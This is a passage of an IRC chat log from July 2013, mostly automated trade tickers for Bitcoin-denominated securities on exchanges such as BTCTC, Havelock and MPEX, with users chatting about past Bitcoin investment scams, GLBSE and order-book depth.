BTC [+] Jul 22 05:57:17 [BTCTC] [LTC-ATF.B2] 22 @ 0.01 = 0.22 BTC [+] Jul 22 05:57:29 [HAVELOCK] [AM100] 74 @ 0.043115 = 3.1905 BTC [-] Jul 22 05:57:32 [HAVELOCK] [AM100] 1 @ 0.043114 BTC [-] Jul 22 05:57:33 [HAVELOCK] [AM100] 10 @ 0.04311201 = 0.4311 BTC [-] Jul 22 05:57:35 [HAVELOCK] [AM100] 4 @ 0.04311 = 0.1724 BTC [-] Jul 22 05:57:37 [HAVELOCK] [AM100] 5 @ 0.0431 = 0.2155 BTC [-] Jul 22 05:57:39 [HAVELOCK] [AM100] 10 @ 0.0430101 = 0.4301 BTC [-] Jul 22 05:57:41 [HAVELOCK] [AM100] 100 @ 0.04301 = 4.301 BTC [-] Jul 22 05:57:43 [HAVELOCK] [AM100] 40 @ 0.043 = 1.72 BTC [-] Jul 22 06:00:26 [BTCTC] [AMC-PT] 2000 @ 0.003 = 6 BTC [-] Jul 22 06:00:58 [BTCTC] [AMC-PT] 2690 @ 0.003 = 8.07 BTC [-] Jul 22 06:01:00 [BTCTC] [AMC-PT] 2000 @ 0.003 = 6 BTC [-] Jul 22 06:01:41 [BTCTC] [AMC-PT] 3353 @ 0.003 = 10.059 BTC [-] Jul 22 06:01:42 [HAVELOCK] [AM100] 62 @ 0.043 = 2.666 BTC [-] Jul 22 06:02:29 [BTCTC] [AMC-PT] 3920 @ 0.003 = 11.76 BTC [-] Jul 22 06:02:37 [BTCTC] [COGNITIVE] 2 @ 0.82 = 1.64 BTC [+] Jul 22 06:02:40 [BTCTC] [COGNITIVE] 9 @ 0.8 = 7.2 BTC [-] Jul 22 06:04:14 So many AMC-PT buys. People are idiots. Jul 22 06:07:54 [BTCTC] [ASICMINER-PT] 1 @ 4.748499 BTC [-] Jul 22 06:09:00 [BTCTC] [ASICMINER-PT] 1 @ 4.748 BTC [-] Jul 22 06:09:30 grilledcat well, their own btc right ? Jul 22 06:10:29 [BTCTC] [TAT.ASICMINER] 2 @ 0.045672 = 0.0913 BTC [-] Jul 22 06:11:19 [BTCTC] [DMS.MINING] 1 @ 0.01539 BTC [-] Jul 22 06:11:28 Yeah, but the fact that you can pretty much set up a cargo cult copy of a successful security and have it make you rich from idiots is bad for BTC. Jul 22 06:11:45 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0036 BTC [+] Jul 22 06:13:06 [BTCTC] [AMC-PT] 100 @ 0.003199 = 0.3199 BTC [+] Jul 22 06:13:17 Maybe idiots is too harsh :) Jul 22 06:13:18 [BTCTC] [AMC-PT] 250 @ 0.003199 = 0.7998 BTC [+] Jul 22 06:13:19 [BTCTC] [AMC-PT] 477 @ 0.003 = 1.431 BTC [-] Jul 22 06:16:07 [BTCTC] [AMC-PT] 2 @ 0.0032 = 0.0064 BTC [+] Jul 22 06:17:26 not sure it's bad for btc per se. Jul 22 06:17:31 people have to learn somehow. Jul 22 06:17:47 considering that only a year ago they were throwing btc by the million to a clear ponzi, Jul 22 06:17:55 i can see a marked improvbement. Jul 22 06:18:10 even if the headcount of cattle talking smack to mpoe-pr in the forum is about stable Jul 22 06:18:26 [BTCTC] [TAT.ASICMINER] 1 @ 0.044603 BTC [-] Jul 22 06:18:34 pirate? Yeah, I wasn't around for that. Jul 22 06:19:27 give them another few weeks, link them to the pesonal responsibility and the ponzi scam again Jul 22 06:19:33 butthurt ragequit again etc. Jul 22 06:20:48 whick one do you think was the dumbest? Dank bank was a good one Jul 22 06:20:53 which Jul 22 06:21:43 kinda hard to tell Jul 22 06:21:47 lol hadn't heard of that one. I need to study the history more. Jul 22 06:22:11 Patrick was pretty lulz Jul 22 06:22:49 personalluy i like eskimo bob's thing Jul 22 06:22:59 heat without hashing. hard to beat. Jul 22 06:23:13 course this is kinda recent. Jul 22 06:23:14 that one is very lol Jul 22 06:23:48 o o o Jul 22 06:23:51 i know which was the best. Jul 22 06:23:59 some forum dork came up with the idea of making a glbse asset Jul 22 06:24:00 very funny to see eskimobob and usag i goig at it Jul 22 06:24:04 invest the proceeds in pmbs Jul 22 06:24:17 and with the dividends from there buy canadian lottery tickets Jul 22 06:24:26 oh yeah Jul 22 06:24:28 he had a scheme and everything, people were all on board, Jul 22 06:24:33 expert advice, all that jazz Jul 22 06:24:36 that was really goid Jul 22 06:24:40 course it was a week before glbse popped Jul 22 06:24:46 so we never got our lulz worth Jul 22 06:25:10 the mist obvious to me was sock on the head guy Jul 22 06:25:14 most Jul 22 06:25:21 which one was that ? Jul 22 06:25:30 o, the oil worker selling btc short at 30 ? Jul 22 06:25:45 [BTCTC] [AMC-PT] 20 @ 0.003199 = 0.064 BTC [-] Jul 22 06:25:46 [BTCTC] [AMC-PT] 54 @ 0.003199 = 0.1727 BTC [-] Jul 22 06:25:47 [BTCTC] [AMC-PT] 298 @ 0.0032 = 0.9536 BTC [+] Jul 22 06:25:49 [BTCTC] [AMC-PT] 40 @ 0.00321 = 0.1284 BTC [+] Jul 22 06:25:50 yeah Jul 22 06:25:50 [BTCTC] [AMC-PT] 160 @ 0.003255 = 0.5208 BTC [+] Jul 22 06:25:51 [BTCTC] [AMC-PT] 1000 @ 0.003295 = 3.295 BTC [+] Jul 22 06:26:00 there's also the shirt printer, Jul 22 06:26:00 that guy was a iduot Jul 22 06:26:12 all professional and whatnot, making shirts for whatever convention and so on Jul 22 06:26:27 bitpride ? Jul 22 06:26:39 i cant remember that one Jul 22 06:27:16 i only vaguely recall. was in here at some point Jul 22 06:27:17 [BTCTC] [BASIC-MINING] 3 @ 0.670005 = 2.01 BTC [-] Jul 22 06:27:18 [BTCTC] [BASIC-MINING] 4 @ 0.670004 = 2.68 BTC [-] Jul 22 06:27:28 but at the time i was busy smh at aethero's thing Jul 22 06:27:35 so didn't pay so much attention Jul 22 06:27:53 theymos dumping glbse was a good one Jul 22 06:29:04 [HAVELOCK] [AM100] 1 @ 0.042901 BTC [-] Jul 22 06:29:26 aethero had a story about being run off the road by russians right ? Jul 22 06:30:35 was a full book of stories. Jul 22 06:30:56 course usagi's accounting back in 2012 is also worth the mention. Jul 22 06:31:00 oh the guy that got hit by a semi and couldnt pay back his loan Jul 22 06:31:08 tho i think he deleted most of the lolcow posts Jul 22 06:31:17 best accounting ever Jul 22 06:31:29 well, sort of like this entire vmc buys amc etc Jul 22 06:31:32 numbers. pfft Jul 22 06:31:33 same basic shceme Jul 22 06:31:48 oh yeah. it is Jul 22 06:32:36 that one smells like shit. so honestly i have not even looked at it Jul 22 06:33:01 and then calling it ActiveMining, or AM for short. It's like he's seeing how far he can go before everyone just bursts out laughing Jul 22 06:33:48 there was also that guy shakaru that basically borrowed from 20 people that didn't know of each other Jul 22 06:34:04 grilledcat scams are made like that deliberately, so as to preselect. Jul 22 06:34:19 there's a reason nigerian spam doesn't spell right. that reason isn't that nobody in nigeria can proofread. Jul 22 06:34:35 [BTCTC] [AMC-PT] 10 @ 0.0032 = 0.032 BTC [-] Jul 22 06:34:37 [BTCTC] [TAT.ASICMINER] 1 @ 0.045669 BTC [+] Jul 22 06:34:45 that reason is that the scammer doesn't want to have to spend his time with people who can read. Jul 22 06:35:43 that does make sense of a lot of stuff Jul 22 06:35:57 yea Jul 22 06:37:50 http://www.theblaze.com/stories/2013/07/21/msnbc-host-dons-tampon-earrings-on-air-to-defend-abortion-rights/ Jul 22 06:37:54 MSNBC Host Dons Tampon Earrings On-Air to Defend Abortion Rights | Video | TheBlaze.com Jul 22 06:37:55 someone needs to explain the logic of this. Jul 22 06:38:02 why's she not wear dilator earrings ? Jul 22 06:38:09 isn't nigerian spam also spelt wrong to get through spam protection, by having the bots spelling differently each time so it won't get filtered for having the same words? Jul 22 06:39:00 mircea .that was very insightful, honestly that should be taught in schools Jul 22 06:39:01 well, depends on the type of spelling errors. randomly distributed stuff is indeed anti-bayesian Jul 22 06:39:07 but that mostly shows in v1agra Jul 22 06:39:22 jborkl what do you mean ? Jul 22 06:39:48 [BTCTC] [AMC-PT] 37 @ 0.003 = 0.111 BTC [-] Jul 22 06:40:11 that scammers intentionally disregard those who are smarter by playing stupid Jul 22 06:40:41 i liked the way you said it Jul 22 06:41:48 a a Jul 22 06:41:57 yeah. kinda ciommon knowledge among the scam fighters. Jul 22 06:42:10 [BTCTC] [ASICMINER-PT] 2 @ 4.70001 = 9.4 BTC [-] Jul 22 06:42:16 [BTCTC] [ASICMINER-PT] 1 @ 4.700003 BTC [-] Jul 22 06:42:18 [BTCTC] [ASICMINER-PT] 1 @ 4.7 BTC [-] Jul 22 06:42:20 [BTCTC] [ASICMINER-PT] 2 @ 4.7 = 9.4 BTC [-] Jul 22 06:43:09 Be interesting to see ASICMiner's financial report soon (hopefully) Jul 22 06:43:31 Unless he's too busy fixing the blades Jul 22 06:43:58 kinda the first ever huh Jul 22 06:44:19 Pretty much. Jul 22 06:44:33 [BTCTC] [LTC-ATF.B2] 1 @ 0.009954 BTC [-] Jul 22 06:44:35 [BTCTC] [LTC-ATF.B2] 49 @ 0.009954 = 0.4877 BTC [-] Jul 22 06:45:18 well, better late than never. Jul 22 06:45:51 Not that he has to prove himself quite as much when he's already given out more than the IPO was. He has a religious following by now :) Jul 22 06:46:01 and it is funny. Mircea at one point was the villian of bitcoin Jul 22 06:46:02 [HAVELOCK] [AM100] 1 @ 0.044666 BTC [+] Jul 22 06:46:05 yeah, one of the few actual assets. Jul 22 06:46:13 jborkl i was ?! Jul 22 06:47:14 oh yeah. all the forum noobs were crying mircea the scammerz Jul 22 06:47:19 you know Jul 22 06:47:35 [BTCTC] [AMC-PT] 163 @ 0.003 = 0.489 BTC [-] Jul 22 06:47:37 [BTCTC] [AMC-PT] 187 @ 0.003 = 0.561 BTC [-] Jul 22 06:47:46 Over anything in particular? Jul 22 06:47:46 i thought the issue was that the girl was pedaling Jul 22 06:48:38 grilledcat groupthink cognitive dissonance basically. Jul 22 06:49:24 people were pro glbse and fanboys Jul 22 06:49:36 didnt work out Jul 22 06:49:43 ended up with so much lol material. Jul 22 06:50:07 ah, the global scam exchange Jul 22 06:51:06 [HAVELOCK] [AM100] 59 @ 0.044666 = 2.6353 BTC [+] Jul 22 06:52:45 [HAVELOCK] [AM100] 50 @ 0.044666 = 2.2333 BTC [+] Jul 22 06:53:03 mircea_popescu do you own any AM? Jul 22 06:54:17 [HAVELOCK] [AM100] 50 @ 0.044666 = 2.2333 BTC [+] Jul 22 06:54:32 [HAVELOCK] [AM100] 25 @ 0.044666 = 1.1167 BTC [+] Jul 22 06:54:46 nope Jul 22 06:55:03 [BTCTC] [TAT.ASICMINER] 3 @ 0.045673 = 0.137 BTC [+] Jul 22 06:55:38 [HAVELOCK] [SMG] 4541 @ 0.000279 = 1.2669 BTC [-] Jul 22 06:55:50 [HAVELOCK] [SMG] 1307 @ 0.000279 = 0.3647 BTC [-] Jul 22 06:57:31 [MPEX] [S.MG] 5000 @ 0.000205 = 1.025 BTC [-] Jul 22 06:58:43 [BTCTC] [AMC-PT] 70 @ 0.00317 = 0.2219 BTC [+] Jul 22 07:00:39 [HAVELOCK] [AM100] 62 @ 0.044666 = 2.7693 BTC [+] Jul 22 07:00:46 [HAVELOCK] [AM100] 29 @ 0.044666 = 1.2953 BTC [+] Jul 22 07:00:49 [HAVELOCK] [SMG] 4852 @ 0.000279 = 1.3537 BTC [-] Jul 22 07:01:53 lol the pts got a pretty good business going, buy on mpex sell on for +50% Jul 22 07:02:02 [BTCTC] [TAT.VIRTUALMINE] 48 @ 0.0036 = 0.1728 BTC [+] Jul 22 07:02:51 [BTCTC] [TAT.VIRTUALMINE] 50 @ 0.00361 = 0.1805 BTC [+] Jul 22 07:04:48 [BTCTC] [TAT.VIRTUALMINE] 39 @ 0.00362 = 0.1412 BTC [+] Jul 22 07:05:21 [BTCTC] [AMC-PT] 30 @ 0.00317 = 0.0951 BTC [+] Jul 22 07:05:25 [BTCTC] [AMC-PT] 50 @ 0.003172 = 0.1586 BTC [+] Jul 22 07:05:25 [BTCTC] [AMC-PT] 150 @ 0.003173 = 0.476 BTC [+] Jul 22 07:05:28 [BTCTC] [AMC-PT] 200 @ 0.003199 = 0.6398 BTC [+] Jul 22 07:05:30 [BTCTC] [AMC-PT] 50 @ 0.0032 = 0.16 BTC [+] Jul 22 07:05:30 [BTCTC] [AMC-PT] 187 @ 0.00329 = 0.6152 BTC [+] Jul 22 07:05:31 [BTCTC] [AMC-PT] 3000 @ 0.003296 = 9.888 BTC [+] Jul 22 07:07:08 S.MG lowest ask on MPEX is 0.000269 though, so not quite as big a difference as it looks :) Jul 22 07:07:38 [HAVELOCK] [AM100] 35 @ 0.044666 = 1.5633 BTC [+] Jul 22 07:08:03 [HAVELOCK] [AM100] 24 @ 0.044666 = 1.072 BTC [+] Jul 22 07:08:05 [HAVELOCK] [AM100] 1 @ 0.04466666 BTC [+] Jul 22 07:08:07 [HAVELOCK] [AM100] 1 @ 0.04466701 BTC [+] Jul 22 07:08:09 [HAVELOCK] [AM100] 5 @ 0.0447 = 0.2235 BTC [+] Jul 22 07:08:11 [HAVELOCK] [AM100] 29 @ 0.04479999 = 1.2992 BTC [+] Jul 22 07:08:13 [MPEX] [S.MPOE] 4734 @ 0.00080248 = 3.7989 BTC [+] Jul 22 07:08:38 [MPEX] [S.MG] 5000 @ 0.000205 = 1.025 BTC [-] [HAVELOCK] [SMG] 4852 @ 0.000279 = 1.3537 BTC [-] Jul 22 07:09:00 [BTCTC] [S.MPOE-PT] 7 @ 0.000835 = 0.0058 BTC [-] Jul 22 07:09:21 Yeah, but that was a sell into the bid wall. Bids and asks are far apart right now. Jul 22 07:09:37 http://mpex.co/?mpsic=S.MG Jul 22 07:09:48 $depth s.mg Jul 22 07:09:49 mircea_popescu: S.MG Bids: ['3250 @ 0.000205', '25000 @ 0.000191', '10000 @ 0.00019', '1000 @ 0.00018111', '15000 @ 0.00018'] Jul 22 07:09:50 mircea_popescu: Asks: ['35000 @ 0.000269', '149400 @ 0.00026901', '10000 @ 0.00027', '10000 @ 0.00028', '10000 @ 0.000291'] Jul 22 07:09:53 S.MG last 5000@0.00020500 Jul 22 07:09:57 ;) Jul 22 07:09:58 [BTCTC] [AMC-PT] 1 @ 0.003298 BTC [+] Jul 22 07:10:21 $depth s.mg Jul 22 07:10:22 grilledcat: S.MG Bids: ['3250 @ 0.000205', '25000 @ 0.000191', '10000 @ 0.00019', '1000 @ 0.00018111', '15000 @ 0.00018'] Jul 22 07:10:23 grilledcat: Asks: ['35000 @ 0.000269', '149400 @ 0.00026901', '10000 @ 0.00027', '10000 @ 0.00028', '10000 @ 0.000291'] Jul 22 07:10:30 cool :) Jul 22 07:10:59 [BTCTC] [AMC-PT] 3 @ 0.00328 = 0.0098 BTC [-] Jul 22 07:11:10 $help Jul 22 07:11:11 grilledcat: (help [] []) -- This command gives a useful description of what does. is only necessary if the command is in more than one plugin. Jul 22 07:11:42 [BTCTC] [PAJKA.BOND] 10 @ 0.0431 = 0.431 BTC [+] Jul 22 07:12:08 http://trilema.com/2013/the-many-ways-available-for-talking-to-mpex/ Jul 22 07:12:10 it's there. Jul 22 07:12:12 The many ways available for talking to MPEx pe Trilema - Un blog de Mircea Popescu. Jul 22 07:12:25 [BTCTC] [TAT.ASICMINER] 2 @ 0.045672 = 0.0913 BTC [-] Jul 22 07:12:27 [BTCTC] [AMC-PT] 415 @ 0.00301 = 1.2492 BTC [-] Jul 22 07:13:00 [BTCTC] [AMC-PT] 130 @ 0.00328 = 0.4264 BTC [+] Jul 22 07:13:27 [HAVELOCK] [SMG] 33 @ 0.00028 = 0.0092 BTC [+] Jul 22 07:13:27 [BTCTC] [AMC-PT] 89 @ 0.003 = 0.267 BTC [-] Jul 22 07:31:51 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.00362 = 0.0072 BTC [+] Jul 22 07:34:38 [BTCTC] [TAT.ASICMINER] 16 @ 0.045672 = 0.7308 BTC [-] Jul 22 07:37:43 [BTCTC] [COGNITIVE] 1 @ 0.789999 BTC [-] Jul 22 07:37:44 [MPEX] [S.MPOE] 3600 @ 0.00080308 = 2.8911 BTC [+] Jul 22 07:40:51 [BTCTC] [TAT.ASICMINER] 4 @ 0.045673 = 0.1827 BTC [+] Jul 22 07:41:50 [HAVELOCK] [SMG] 1 @ 0.00028 BTC [+] Jul 22 07:45:37 [BTCTC] [LTC-ATF.B2] 144 @ 0.01 = 1.44 BTC [+] Jul 22 07:46:00 [BTCTC] [S.MPOE-PT] 2 @ 0.000835 = 0.0017 BTC [-] Jul 22 07:46:18 [BTCTC] [TAT.ASICMINER] 1 @ 0.045673 BTC [+] Jul 22 07:53:56 [BTCTC] [AMC-PT] 105 @ 0.0031 = 0.3255 BTC [+] Jul 22 07:59:07 [MPEX] [S.MPOE] 3366 @ 0.00080248 = 2.7011 BTC [-] Jul 22 07:59:27 [BTCTC] [TAT.ASICMINER] 37 @ 0.045673 = 1.6899 BTC [+] Jul 22 07:59:29 [BTCTC] [TAT.ASICMINER] 42 @ 0.045675 = 1.9184 BTC [+] Jul 22 08:00:30 [HAVELOCK] [AM1] 1 @ 4.7 BTC [+] Jul 22 08:03:33 [BTCTC] [TAT.ASICMINER] 1 @ 0.045675 BTC [+] Jul 22 08:13:38 [BTCTC] [TAT.ASICMINER] 23 @ 0.045675 = 1.0505 BTC [+] Jul 22 08:23:35 [MPEX] [S.MPOE] 1284 @ 0.00080014 = 1.0274 BTC [-] Jul 22 08:23:45 [MPEX] [S.MPOE] 3865 @ 0.00080308 = 3.1039 BTC [+] Jul 22 08:24:45 [MPEX] [S.MPOE] 5200 @ 0.00080001 = 4.1601 BTC [-] Jul 22 08:24:47 [MPEX] [S.MPOE] 2700 @ 0.00079999 = 2.16 BTC [-] Jul 22 08:28:44 [BTCTC] [TAT.ASICMINER] 2 @ 0.045015 = 0.09 BTC [-] Jul 22 08:30:04 [BTCTC] [AMC-PT] 100 @ 0.003199 = 0.3199 BTC [+] Jul 22 08:31:46 [BTCTC] [AMC-PT] 78 @ 0.003199 = 0.2495 BTC [+] Jul 22 08:34:28 [BTCTC] [TAT.ASICMINER] 1 @ 0.045674 BTC [+] Jul 22 08:47:51 [BTCTC] [AMC-PT] 113 @ 0.003 = 0.339 BTC [-] Jul 22 08:47:53 [BTCTC] [AMC-PT] 300 @ 0.003 = 0.9 BTC [-] Jul 22 08:47:55 [BTCTC] [AMC-PT] 11 @ 0.003 = 0.033 BTC [-] Jul 22 08:50:01 [BTCTC] [AMC-PT] 21 @ 0.003199 = 0.0672 BTC [+] Jul 22 08:50:03 [BTCTC] [AMC-PT] 357 @ 0.0032 = 1.1424 BTC [+] Jul 22 08:50:04 [BTCTC] [AMC-PT] 622 @ 0.0032 = 1.9904 BTC [+] Jul 22 08:52:23 [MPEX] [S.MPOE] 435 @ 0.00080308 = 0.3493 BTC [+] Jul 22 08:52:25 [MPEX] [S.MPOE] 5100 @ 0.00080785 = 4.12 BTC [+] Jul 22 09:00:39 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.003578 BTC [-] Jul 22 09:01:07 http://www.piticigratis.com/wp-content/uploads/2013/06/longslap.gif Jul 22 09:02:24 [BTCTC] [TAT.ASICMINER] 1 @ 0.045674 BTC [+] Jul 22 09:04:35 [BTCTC] [AMC-PT] 50 @ 0.002952 = 0.1476 BTC [-] Jul 22 09:06:00 [MPEX] [S.MPOE] 4750 @ 0.0008089 = 3.8423 BTC [+] Jul 22 09:08:09 [BTCTC] [LTC-ATF.B2] 398 @ 0.01 = 3.98 BTC [+] Jul 22 09:09:34 lol mircea_popescu that's veggos Jul 22 09:09:50 what a legend Jul 22 09:10:14 i have nop idea what that is Jul 22 09:10:43 http://en.wikipedia.org/wiki/Thanasis_Veggos Jul 22 09:17:20 [BTCTC] [DMS.SELLING] 15 @ 0.024739 = 0.3711 BTC [+] Jul 22 09:19:25 aah Jul 22 09:20:49 [BTCTC] [DMS.SELLING] 30 @ 0.0248 = 0.744 BTC [+] Jul 22 09:22:32 [BTCTC] [DMS.SELLING] 30 @ 0.0248 = 0.744 BTC [+] Jul 22 09:23:33 [BTCTC] [DMS.SELLING] 15 @ 0.0248 = 0.372 BTC [+] Jul 22 09:23:44 [MPEX] [S.MPOE] 7125 @ 0.0008089 = 5.7634 BTC [+] Jul 22 09:26:42 [BTCTC] [DMS.SELLING] 217 @ 0.0248 = 5.3816 BTC [+] Jul 22 09:26:44 [BTCTC] [DMS.SELLING] 32 @ 0.0248 = 0.7936 BTC [+] Jul 22 09:31:34 [BTCTC] [AMC-PT] 22 @ 0.003 = 0.066 BTC [+] Jul 22 09:35:43 [BTCTC] [LTC-ATF.B2] 7 @ 0.009956 = 0.0697 BTC [-] Jul 22 09:37:10 [BTCTC] [TAT.ASICMINER] 1 @ 0.045675 BTC [+] Jul 22 09:37:52 [BTCTC] [AMC-PT] 200 @ 0.003 = 0.6 BTC [+] Jul 22 09:40:27 [BTCTC] [DMS.MINING] 2 @ 0.014999 = 0.03 BTC [-] Jul 22 09:42:24 [BTCTC] [AMC-PT] 100 @ 0.003 = 0.3 BTC [+] Jul 22 09:42:26 [BTCTC] [AMC-PT] 50 @ 0.002952 = 0.1476 BTC [-] Jul 22 09:42:30 [BTCTC] [AMC-PT] 100 @ 0.002952 = 0.2952 BTC [-] Jul 22 09:42:30 [BTCTC] [AMC-PT] 10000 @ 0.002951 = 29.51 BTC [-] Jul 22 09:49:57 [BTCTC] [AMC-PT] 2078 @ 0.002951 = 6.1322 BTC [-] Jul 22 09:50:49 [BTCTC] [DMS.SELLING] 168 @ 0.0248 = 4.1664 BTC [+] Jul 22 09:51:22 [BTCTC] [AMC-PT] 100 @ 0.003 = 0.3 BTC [+] Jul 22 09:52:54 [HAVELOCK] [AM100] 2 @ 0.043211 = 0.0864 BTC [-] Jul 22 09:54:08 [BTCTC] [AMC-PT] 200 @ 0.003189 = 0.6378 BTC [+] Jul 22 09:54:30 [BTCTC] [AMC-PT] 95 @ 0.00319 = 0.3031 BTC [+] Jul 22 09:54:32 [BTCTC] [AMC-PT] 1000 @ 0.003199 = 3.199 BTC [+] Jul 22 09:55:40 [BTCTC] [DMS.MINING] 4 @ 0.01451 = 0.058 BTC [-] Jul 22 09:55:42 [BTCTC] [DMS.MINING] 233 @ 0.0145 = 3.3785 BTC [-] Jul 22 09:59:02 [BTCTC] [DMS.MINING] 167 @ 0.0145 = 2.4215 BTC [-] Jul 22 09:59:04 [BTCTC] [DMS.MINING] 25 @ 0.0145 = 0.3625 BTC [-] Jul 22 09:59:41 [BTCTC] [DMS.SELLING] 99 @ 0.02484 = 2.4592 BTC [+] Jul 22 09:59:41 [BTCTC] [AMC-PT] 2 @ 0.003229 = 0.0065 BTC [+] Jul 22 10:02:16 [BTCTC] [AMC-PT] 10 @ 0.003229 = 0.0323 BTC [+] Jul 22 10:09:18 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.003567 BTC [-] Jul 22 10:09:21 [HAVELOCK] [AM100] 3 @ 0.044797 = 0.1344 BTC [+] Jul 22 10:14:50 [BTCTC] [AMC-PT] 200 @ 0.002976 = 0.5952 BTC [-] Jul 22 10:15:13 [BTCTC] [TAT.ASICMINER] 25 @ 0.04512 = 1.128 BTC [-] Jul 22 10:15:26 [BTCTC] [TAT.ASICMINER] 48 @ 0.045119 = 2.1657 BTC [-] Jul 22 10:16:29 good news bitcoin Jul 22 10:16:43 the royal vagina is being rearranged Jul 22 10:16:53 [BTCTC] [ASICMINER-PT] 1 @ 4.700001 BTC [+] Jul 22 10:16:54 [BTCTC] [ASICMINER-PT] 1 @ 4.7 BTC [-] Jul 22 10:17:21 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.003566 = 0.0071 BTC [-] Jul 22 10:18:41 [BTCTC] [TAT.VIRTUALMINE] 7 @ 0.003565 = 0.025 BTC [-] Jul 22 10:19:30 [BTCTC] [AMC-PT] 100 @ 0.003001 = 0.3001 BTC [+] Jul 22 10:21:03 [BTCTC] [AMC-PT] 1 @ 0.0031 BTC [+] Jul 22 10:21:05 [BTCTC] [AMC-PT] 1 @ 0.003002 BTC [-] Jul 22 10:21:07 [BTCTC] [AMC-PT] 698 @ 0.003001 = 2.0947 BTC [-] Jul 22 10:21:39 [BTCTC] [AMC-PT] 1 @ 0.003224 BTC [+] Jul 22 10:21:47 [HAVELOCK] [HIM] 9 @ 0.266 = 2.394 BTC [-] Jul 22 10:22:08 [HAVELOCK] [HIM] 1 @ 0.256001 BTC [-] Jul 22 10:22:14 [HAVELOCK] [HIM] 4 @ 0.25600001 = 1.024 BTC [-] Jul 22 10:22:28 [HAVELOCK] [HIM] 5 @ 0.2551 = 1.2755 BTC [-] Jul 22 10:22:53 [HAVELOCK] [HIM] 2 @ 0.255 = 0.51 BTC [-] Jul 22 10:22:56 [BTCTC] [AMC-PT] 199 @ 0.003224 = 0.6416 BTC [+] Jul 22 10:24:28 [BTCTC] [AMC-PT] 415 @ 0.003225 = 1.3384 BTC [+] Jul 22 10:24:30 [BTCTC] [AMC-PT] 188 @ 0.003229 = 0.6071 BTC [+] Jul 22 10:24:31 [BTCTC] [AMC-PT] 378 @ 0.00323 = 1.2209 BTC [+] Jul 22 10:24:33 [BTCTC] [AMC-PT] 1850 @ 0.003239 = 5.9922 BTC [+] Jul 22 10:24:38 [BTCTC] [AMC-PT] 481 @ 0.003224 = 1.5507 BTC [-] Jul 22 10:26:08 [BTCTC] [ASICMINER-PT] 1 @ 4.699901 BTC [-] Jul 22 10:26:10 [BTCTC] [ASICMINER-PT] 1 @ 4.6999 BTC [-] Jul 22 10:26:12 [BTCTC] [ASICMINER-PT] 1 @ 4.6978 BTC [-] Jul 22 10:26:20 [BTCTC] [ASICMINER-PT] 1 @ 4.68 BTC [-] Jul 22 10:26:26 [BTCTC] [ASICMINER-PT] 1 @ 4.68 BTC [-] Jul 22 10:27:46 [HAVELOCK] [HIM] 1 @ 0.27999 BTC [+] Jul 22 10:28:01 [BTCTC] [AMC-PT] 100 @ 0.003249 = 0.3249 BTC [+] Jul 22 10:28:03 [BTCTC] [AMC-PT] 3069 @ 0.00325 = 9.9743 BTC [+] Jul 22 10:28:04 [BTCTC] [AMC-PT] 4900 @ 0.003298 = 16.1602 BTC [+] Jul 22 10:29:35 [BTCTC] [ASICMINER-PT] 1 @ 4.665 BTC [-] Jul 22 10:29:39 [BTCTC] [ASICMINER-PT] 1 @ 4.665 BTC [-] Jul 22 10:29:41 [BTCTC] [ASICMINER-PT] 1 @ 4.660001 BTC [-] Jul 22 10:29:43 [BTCTC] [ASICMINER-PT] 1 @ 4.66 BTC [-] Jul 22 10:29:45 [BTCTC] [ASICMINER-PT] 4 @ 4.631163 = 18.5247 BTC [-] Jul 22 10:29:46 [BTCTC] [ASICMINER-PT] 1 @ 4.631162 BTC [-] Jul 22 10:29:48 [BTCTC] [ASICMINER-PT] 2 @ 4.631161 = 9.2623 BTC [-] Jul 22 10:29:50 [BTCTC] [ASICMINER-PT] 1 @ 4.631 BTC [-] Jul 22 10:29:52 [BTCTC] [ASICMINER-PT] 1 @ 4.631 BTC [-] Jul 22 10:29:54 [BTCTC] [ASICMINER-PT] 1 @ 4.631 BTC [-] Jul 22 10:29:56 [BTCTC] [ASICMINER-PT] 2 @ 4.63 = 9.26 BTC [-] Jul 22 10:29:58 [BTCTC] [ASICMINER-PT] 2 @ 4.63 = 9.26 BTC [-] Jul 22 10:30:00 [BTCTC] [ASICMINER-PT] 2 @ 4.6251 = 9.2502 BTC [-] Jul 22 10:30:46 [BTCTC] [AMC-PT] 100 @ 0.003297 = 0.3297 BTC [-] Jul 22 10:30:46 [BTCTC] [AMC-PT] 100 @ 0.003298 = 0.3298 BTC [+] Jul 22 10:31:02 [BTCTC] [AMC-PT] 2384 @ 0.003299 = 7.8648 BTC [+] Jul 22 10:31:06 [BTCTC] [AMC-PT] 3 @ 0.003299 = 0.0099 BTC [+] Jul 22 10:31:30 [BTCTC] [AMC-PT] 1450 @ 0.00331 = 4.7995 BTC [+] Jul 22 10:31:36 [BTCTC] [AMC-PT] 250 @ 0.003333 = 0.8333 BTC [+] Jul 22 10:31:40 [BTCTC] [AMC-PT] 44 @ 0.00339 = 0.1492 BTC [+] Jul 22 10:31:43 [BTCTC] [AMC-PT] 100 @ 0.0034 = 0.34 BTC [+] Jul 22 10:31:46 [BTCTC] [AMC-PT] 2000 @ 0.0034 = 6.8 BTC [+] Jul 22 10:31:54 [BTCTC] [AMC-PT] 2000 @ 0.0034 = 6.8 BTC [+] Jul 22 10:31:56 [BTCTC] [AMC-PT] 9750 @ 0.0034 = 33.15 BTC [+] Jul 22 10:31:58 [BTCTC] [AMC-PT] 70 @ 0.0034 = 0.238 BTC [+] Jul 22 10:32:05 [BTCTC] [AMC-PT] 100 @ 0.0034 = 0.34 BTC [+] Jul 22 10:34:33 [BTCTC] [TAT.ASICMINER] 3 @ 0.04567 = 0.137 BTC [+] Jul 22 10:37:26 [BTCTC] [AMC-PT] 100 @ 0.003494 = 0.3494 BTC [+] Jul 22 10:40:30 [BTCTC] [AMC-PT] 3 @ 0.0032 = 0.0096 BTC [-] Jul 22 10:45:07 [BTCTC] [DMS.MINING] 26 @ 0.014201 = 0.3692 BTC [-] Jul 22 10:47:41 [BTCTC] [AMC-PT] 100 @ 0.003447 = 0.3447 BTC [+] Jul 22 10:50:59 [BTCTC] [ASICMINER-PT] 1 @ 4.635 BTC [+] Jul 22 10:51:01 [BTCTC] [ASICMINER-PT] 1 @ 4.631013 BTC [-] Jul 22 10:51:04 [BTCTC] [ASICMINER-PT] 1 @ 4.631011 BTC [-] Jul 22 10:51:05 [BTCTC] [ASICMINER-PT] 5 @ 4.631 = 23.155 BTC [-] Jul 22 10:51:07 [BTCTC] [ASICMINER-PT] 